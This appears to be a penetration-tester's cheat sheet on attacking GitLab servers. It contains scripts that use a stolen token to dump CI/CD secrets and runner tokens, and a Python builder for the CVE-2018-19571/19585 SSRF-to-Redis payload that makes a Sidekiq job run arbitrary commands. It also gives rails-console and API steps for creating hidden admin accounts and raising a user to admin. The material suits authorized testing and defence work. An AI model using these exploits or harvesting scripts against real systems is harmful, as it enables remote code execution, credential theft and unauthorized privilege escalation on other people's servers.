# GitLab

* <https://devcraft.io/assets/hacktivitycon-slides.pdf>
* <https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/>
* <https://github.com/dotPY-hax/gitlab_RCE>

## Search for Secrets

* <https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/>
* <https://rtfm.co.ua/en/git-scanning-repositories-for-secrets-using-gitleaks/>

Search for CI/CD variables and runner tokens:

```bash
TOKEN=$(cat token)
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"

# Check whom the token belongs to (and whether it is still valid)
curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq

# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
#    (100 projects per page; repeat until the output is empty)
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'

# 2. bash get_secrets.sh
for id in $(cat projects); do
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'

    # CI/CD variables (values are returned only if the token has Maintainer or higher on the project)
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq

    # Runner registration token (likewise only present for Maintainer and above)
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.runners_token'
done
```

Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitleaks):

```
$ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
$ TMPFILE=$(mktemp); ./gitleaks detect -s . -v -r "$TMPFILE" > /dev/null; jq . "$TMPFILE"; rm "$TMPFILE"
```
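The two shell snippets above walk a group page by page and then query each project by hand. The following script does the same walk in one go and triages what comes back; it is an added example, not code from the original page. It follows the `X-Next-Page` header for pagination, collects every project's CI/CD variables and `runners_token`, and tags values that look like well-known credential formats (the regexes, the `SECRET_PATTERNS` names and the `megacorp` group are assumptions for illustration). The responses served by `fake_get` are constructed so the script can be exercised offline; `http_get` is the real transport.

```python
import json
import re
import urllib.parse
import urllib.request

# Credential formats worth flagging in dumped CI/CD variables (assumed set; extend as needed).
SECRET_PATTERNS = {
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_-]{20,}\b"),
    "gitlab_runner_token": re.compile(r"\bglrt-[A-Za-z0-9_-]{20,}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    # matched against the variable *name*, not its value
    "generic_password_var": re.compile(r"(?i)(passw(or)?d|secret|token|api_?key)"),
}


def http_get(url, token):
    """Real transport: GET with PRIVATE-TOKEN, returns (body, headers)."""
    req = urllib.request.Request(url, headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode(), dict(resp.headers)


def paginate(api, token, path, params=None, get=http_get):
    """Yield every object of a paginated collection, following X-Next-Page."""
    params = dict(params or {})
    params.setdefault("per_page", 100)
    page = "1"
    while page:
        params["page"] = page
        body, headers = get(f"{api}{path}?{urllib.parse.urlencode(params)}", token)
        yield from json.loads(body)
        # GitLab sends an empty X-Next-Page on the last page
        page = {k.lower(): v for k, v in headers.items()}.get("x-next-page", "")


def classify_variable(var):
    """Names of the SECRET_PATTERNS that match a variable's value (or, for the generic one, its key)."""
    hits = []
    for name, rx in SECRET_PATTERNS.items():
        target = var.get("key", "") if name == "generic_password_var" else str(var.get("value", ""))
        if rx.search(target):
            hits.append(name)
    return hits


def dump_group_secrets(api, token, group, get=http_get):
    """Collect CI/CD variables and runner tokens of every project in a group, subgroups included."""
    findings = []
    group_path = f"/groups/{urllib.parse.quote(str(group), safe='')}/projects"
    for proj in paginate(api, token, group_path, {"include_subgroups": "true"}, get):
        pid, name = proj["id"], proj["path_with_namespace"]
        detail = json.loads(get(f"{api}/projects/{pid}", token)[0])
        # runners_token is only included in the project JSON for Maintainer and above
        if detail.get("runners_token"):
            findings.append({"project": name, "kind": "runners_token", "key": "runners_token",
                             "value": detail["runners_token"], "tags": []})
        for var in paginate(api, token, f"/projects/{pid}/variables", None, get):
            findings.append({"project": name, "kind": "variable", "key": var["key"],
                             "value": var.get("value"), "protected": var.get("protected"),
                             "masked": var.get("masked"), "tags": classify_variable(var)})
    return findings


# Constructed sample responses (made-up IDs and values) standing in for a real instance.
_API = "https://gitlab.megacorp.local/api/v4"
_SAMPLE = {
    "/groups/megacorp/projects?include_subgroups=true&per_page=100&page=1":
        ('[{"id": 7, "path_with_namespace": "megacorp/infra"}]', {"X-Next-Page": "2"}),
    "/groups/megacorp/projects?include_subgroups=true&per_page=100&page=2":
        ('[{"id": 9, "path_with_namespace": "megacorp/app"}]', {"X-Next-Page": ""}),
    "/projects/7": ('{"id": 7, "runners_token": "GR1348941AbCdEfGhIjKlMnOpQrSt"}', {}),
    "/projects/9": ('{"id": 9}', {}),
    "/projects/7/variables?per_page=100&page=1":
        ('[{"key": "AWS_ACCESS_KEY_ID", "value": "AKIAIOSFODNN7EXAMPLE", "protected": false, "masked": true},'
         ' {"key": "DEPLOY_ENV", "value": "staging", "protected": false, "masked": false}]', {"X-Next-Page": ""}),
    "/projects/9/variables?per_page=100&page=1":
        ('[{"key": "DB_PASSWORD", "value": "s3cr3t", "protected": true, "masked": true}]', {"X-Next-Page": ""}),
}


def fake_get(url, token):
    """Offline transport serving the constructed responses above."""
    return _SAMPLE[url[len(_API):]]


def demo():
    return dump_group_secrets(_API, "glpat-placeholder", "megacorp", get=fake_get)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Against a live instance, replace `fake_get` with the default transport (`dump_group_secrets(API, TOKEN, GROUP)`); variables without tags are still worth reading by hand, since the patterns only catch formats with a recognisable prefix.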

## GitLab Runners Abuse

* <https://frichetten.com/blog/abusing-gitlab-runners/>
* <https://github.com/Frichetten/gitlab-runner-research>

## SSRF > Redis > RCE (CE/EE)

**CVE-2018-19571, CVE-2018-19585**

* <https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41293>
* <https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/>
* <https://www.exploit-db.com/exploits/49334>

Instead of the IPv6 address form, the following payload can also be used to bypass the localhost filter checks; note that it only works with the `git://` scheme:

```
git://127.0.0.1:6379/%0a<REDIS_COMMANDS>
```
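The payload above is a CRLF injection: each `%0a` becomes a line break in what Redis receives, and Redis's inline protocol treats every line as a command. The helper below, an added example and not the referenced PoC, packs a list of Redis commands into such a `git://` URL, quotes multi-word arguments the way the inline protocol expects, and shows the lines Redis would parse. The `sidekiq_job` and `sidekiq_push_commands` helpers build the queue push used by the linked exploit (`resque:gitlab` is GitLab's Sidekiq namespace); the `GitlabShellWorker`/`class_eval` pair in `build_poc` is taken from the referenced writeup and PoC and should be checked against them for the target version. Host and port default to the page's `127.0.0.1:6379`.

```python
import json
import secrets
import time
import urllib.parse


def redis_quote(arg):
    """Quote one argument for Redis's inline protocol (double quotes, backslash escapes)."""
    return '"' + arg.replace("\\", "\\\\").replace('"', '\\"') + '"'


def sidekiq_job(klass, args, queue):
    """Serialize a Sidekiq job in the JSON shape workers read from Redis."""
    now = time.time()
    job = {"class": klass, "args": args, "retry": 3, "queue": queue,
           "jid": secrets.token_hex(12), "created_at": now, "enqueued_at": now}
    return json.dumps(job, separators=(",", ":"))


def sidekiq_push_commands(queue, job_json):
    """Redis commands that register a queue and push one job onto it (resque:gitlab namespace)."""
    return [
        "multi",
        f"sadd resque:gitlab:queues {queue}",
        f"lpush resque:gitlab:queue:{queue} {redis_quote(job_json)}",
        "exec",
    ]


def commands_to_git_url(commands, host="127.0.0.1", port=6379):
    """Pack commands into the path of a git:// URL, one per line, newlines percent-encoded."""
    payload = "\n" + "\n".join(commands) + "\n"
    return f"git://{host}:{port}/{urllib.parse.quote(payload, safe='')}"


def as_seen_by_redis(url):
    """Preview: the decoded path split into the lines Redis's inline parser will read."""
    path = urllib.parse.unquote(urllib.parse.urlsplit(url).path).lstrip("/")
    return [line for line in path.split("\n") if line]


def build_poc(cmd, host="127.0.0.1", port=6379):
    """Import URL that enqueues a job running `cmd` (worker/args assumed from the referenced PoC)."""
    job = sidekiq_job("GitlabShellWorker", ["class_eval", f"open('|{cmd}').read"], "system_hook_push")
    return commands_to_git_url(sidekiq_push_commands("system_hook_push", job), host, port)


if __name__ == "__main__":
    url = build_poc("id")
    print(url)
    for line in as_seen_by_redis(url):
        print("redis <-", line)
```

The IPv6 host form from the referenced PoC can be passed as `host`; the rest of the payload is unchanged.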

## Path Traversal > LFI > RCE (CE/EE)

**CVE-2020-10977**

* <https://xakep.ru/2020/05/26/gitlab-exploit/>
* <https://www.exploit-db.com/exploits/49076>

## Path Traversal > File Write > RCE (EE)

**CVE-2019-19088**

* <https://gitlab.com/gitlab-org/gitlab/-/issues/36029>

## gitlab-rails

* <https://docs.gitlab.com/ee/user/profile/account/create_accounts.html>

Add new admin user from console:

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > ActiveRecord::Base.logger = Logger.new($stdout)
irb(main):002:0 > User.find(1)
=> #<User id:1 @root>
irb(main):003:0 > user = User.create(:username => 'snovvcrash', :password => 'Passw0rd!', :password_confirmation => 'Passw0rd!', :admin => true, :name => 'snovvcrash', :email => 'snovvcrash@megacorp.local')
irb(main):004:0 > user.save!
irb(main):005:0 > user.confirmation_token
=> "ZVrM4KsyEdSoTJvo8kx_"
```

Then activate the account by navigating to `https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_`.

Or just skip the verification:

```ruby
irb(main):003:0 > user.skip_confirmation!
irb(main):004:0 > user.save!
```

Also, for GitLab >= 16.11 the user must be assigned a personal namespace before saving:

```ruby
irb(main):003:0 > user.assign_personal_namespace(Organizations::Organization.default_organization)
irb(main):004:0 > user.save!
```

Enable password authentication for the web UI (e.g., when only LDAP authentication is available):

```ruby
$ sudo gitlab-rails console
irb(main):001:0 > Gitlab::CurrentSettings.update!(password_authentication_enabled_for_web: true)
irb(main):002:0 > exit
$ sudo gitlab-ctl reconfigure
```

Grant a low-priv user admin's privileges via API:

```bash
# Check token privileges
$ curl -sX GET -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/user" | jq '.is_admin'
# Grant low-priv user admin's privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=true" | jq '.is_admin'
# Revert low-priv user's original privileges
$ curl -sX PUT -H "PRIVATE-TOKEN: $ADMIN_TOKEN" "https://gitlab.megacorp.local/api/v4/users/$LOWPRIV_ID" -d "admin=false" | jq '.is_admin'
```

## Arbitrary File Read

**CVE-2023-2825**

* <https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/>
* <https://github.com/Occamsec/CVE-2023-2825#cve-2023-2825>
